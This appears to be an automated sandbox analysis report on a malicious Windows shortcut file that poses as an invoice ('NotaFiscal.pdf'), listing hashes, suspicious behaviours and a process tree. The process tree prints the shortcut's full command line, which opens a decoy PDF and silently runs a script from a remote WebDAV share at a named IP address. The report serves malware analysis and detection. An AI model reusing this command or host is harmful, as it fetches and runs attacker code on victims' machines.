a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef

Analysis

max time kernel
119s
max time network
123s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
13-04-2024 17:42

Target

desktop-20a11ho.lnk
Size

3KB
MD5

cd4f87e63be918ec6ef8d39082669834
SHA1

77a144bb45fff156050324b8318741bcae27d9f8
SHA256

a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef
SHA512

877e9c3d0157db9c73729f94155cf6481257d6f64dbe564678cc1e35f471b20434fa27ef901b3c1b103fd4d6b715e906fe641faba6c3e9709caf05175de0e1c2

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

AcroRd32.exe

pid process

2492 AcroRd32.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

AcroRd32.exe

pid process

2492 AcroRd32.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

AcroRd32.exe

pid process

2492 AcroRd32.exe
2492 AcroRd32.exe

pid	process
2492	AcroRd32.exe

pid	process
2492	AcroRd32.exe

pid	process
2492	AcroRd32.exe
2492	AcroRd32.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2812 wrote to memory of 2612	2812	cmd.exe	cmd.exe
PID 2812 wrote to memory of 2612	2812	cmd.exe	cmd.exe
PID 2812 wrote to memory of 2612	2812	cmd.exe	cmd.exe
PID 2612 wrote to memory of 2492	2612	cmd.exe	AcroRd32.exe
PID 2612 wrote to memory of 2492	2612	cmd.exe	AcroRd32.exe
PID 2612 wrote to memory of 2492	2612	cmd.exe	AcroRd32.exe
PID 2612 wrote to memory of 2492	2612	cmd.exe	AcroRd32.exe
PID 2612 wrote to memory of 1540	2612	cmd.exe	cmd.exe
PID 2612 wrote to memory of 1540	2612	cmd.exe	cmd.exe
PID 2612 wrote to memory of 1540	2612	cmd.exe	cmd.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\desktop-20a11ho.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /min /c "echo Visualizacao indisponivel > C:\Users\Admin\downloads\NotaFiscal.pdf & start C:\Users\Admin\downloads\NotaFiscal.pdf & start /min cmd.exe /c "\\191.239.116.217@80\Documentos\files\a3.cmd""
2⤵
- Suspicious use of WriteProcessMemory
PID:2612

C:\Windows\system32\cmd.exe
cmd.exe /c "\\191.239.116.217@80\Documentos\files\a3.cmd"
3⤵
PID:1540

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
8d40a1b683b1bfcefb65218fca549a28

SHA1
de6e1fb69224e10481ba974d4200f84ca2f47ca8

SHA256
b70a2d51851bceaebc7cec6c95e4d0b865812c25674be163296e846e346d9e93

SHA512
11f567615c688c310c22a04964dcbe085489306ba11c887cee6b7aa5ad730b8f0fa14c389c4e32ec117129bbaa8fc332ef5a6db166d847ade8c9a04a7597a8cd

Download Submit
C:\Users\Admin\Downloads\NotaFiscal.pdf

Filesize
29B

MD5
823a9caa296579d6a40cd5195d969727

SHA1
5592813787ecff9133229439498d624339c07ece

SHA256
60b827294f341e5f200c6512b976cac056a592ac1abdd932af8abff314b7bb0e

SHA512
77ec77b000d5d230071a101954968f585ceed9e589652af38411d14b594a7432b610ef9c8b7d1c9256a5e6fe5eeda53d017a4c6d840c987b884b9cca17d7e0bc

Download Submit